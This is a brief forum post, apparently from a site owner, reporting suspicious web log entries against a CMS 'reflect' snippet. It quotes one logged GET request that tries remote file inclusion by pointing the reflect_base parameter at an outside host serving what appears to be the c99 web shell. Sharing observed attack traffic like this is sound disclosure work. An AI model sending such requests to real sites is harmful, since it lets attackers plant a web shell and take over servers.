Reflect exploit?

Just been going through my web logs and noticing some strange hits for reflect snippet

I’m not sure if this is reported but thought I had better post

I’m getting hits like:

GET /assets/snippets/reflect/snippet.reflect.php reflect_base=http://www.evilc0der.com/c99.txt????
